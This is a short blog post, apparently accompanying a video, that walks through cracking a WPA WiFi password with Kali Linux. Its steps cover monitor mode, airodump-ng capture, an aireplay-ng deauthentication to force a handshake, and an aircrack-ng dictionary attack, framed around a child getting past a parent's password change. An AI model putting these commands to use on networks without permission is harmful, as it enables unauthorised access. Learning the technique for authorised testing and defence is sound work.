I haven’t really done a technical walkthrough type video and I now remember why I never did. These things are hard to do and involve two of my least favourite elements of video-making, screen captures and voiceovers. Which is why I always tip my hat to Vivek and his great tutorials over at SecurityTube.net
The idea behind this video was one of those posts on Facebook where a ‘clever’ parent changes the WiFi password and blackmails the child into first doing homework and chores before being able to access the net.
In the video, I kind of glossed over some steps and was a bit quick, so for completeness here are the commands you need once you get Kali up and running and have an injection-capable wireless adapter.
1. airmon-ng (will list all wireless cards)
2. airmon-ng start wlan0 (or whatever your wireless card is – it will start monitor mode mine was mon0)
3. airodump-ng mon0
4. Ctrl+C (once you see the network you want to connect to.
5. Airodump-ng -c [channel] -bssid [bssid] -w /root/Desktop/Catch mon0 (replace channel and bssid accordingly)
6. Open a second terminal window
7. aireplay-ng -0 2 -a [router bssid] -c [client bssid] mon0
8. You should see the message that you’ve captured the handshake so hit Ctrl+C
9. aircrack-ng -a2 -b [router bssid] -w[path to dictionary] /root/Desktop/*.cap
10. That’s it – you should have captured the password, if it’s in the dictionary you downloaded.
Like any security testing, I need not remind you that these kinds of tests should only be done on equipment you own or have permission to test.
Now, in reality, pulling something like this off isn’t very difficult. In under a dozen commands you can potentially grab a wifi password, which is script kiddie territory. The real question goes a lot deeper what can be done with this information? What other information is within the .CAP file? Can this be automated and chained? How can this scenario be run in different ways from an attacker perspective – and also how can you use this knowledge to build better defences?